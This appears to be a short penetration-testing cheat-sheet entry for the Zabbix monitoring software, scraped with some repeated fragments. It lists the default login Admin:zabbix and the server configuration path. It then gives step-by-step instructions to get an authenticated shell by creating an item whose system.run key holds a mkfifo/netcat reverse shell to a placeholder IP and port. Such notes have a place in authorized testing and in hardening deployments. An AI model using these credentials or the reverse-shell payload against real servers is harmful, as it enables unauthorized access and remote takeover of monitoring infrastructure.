zabbix
Default Credentials
Admin:zabbixInteresting Paths
# config file
/etc/zabbix/zabbix_server.confShell (authenticated)
References
Last updated
Zabbix is an open-source monitoring software tool for diverse IT components, including networks, servers, virtual machines and cloud services. Zabbix provides monitoring metrics, among others network utilization, CPU load and disk space consumption.
Admin:zabbix# config file
/etc/zabbix/zabbix_server.confConfiguration > Hosts > Items > Create New
set key: system.run[rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc IP PORT >/tmp/f &,nowait]
Click Test > Get Value & Test
Last updated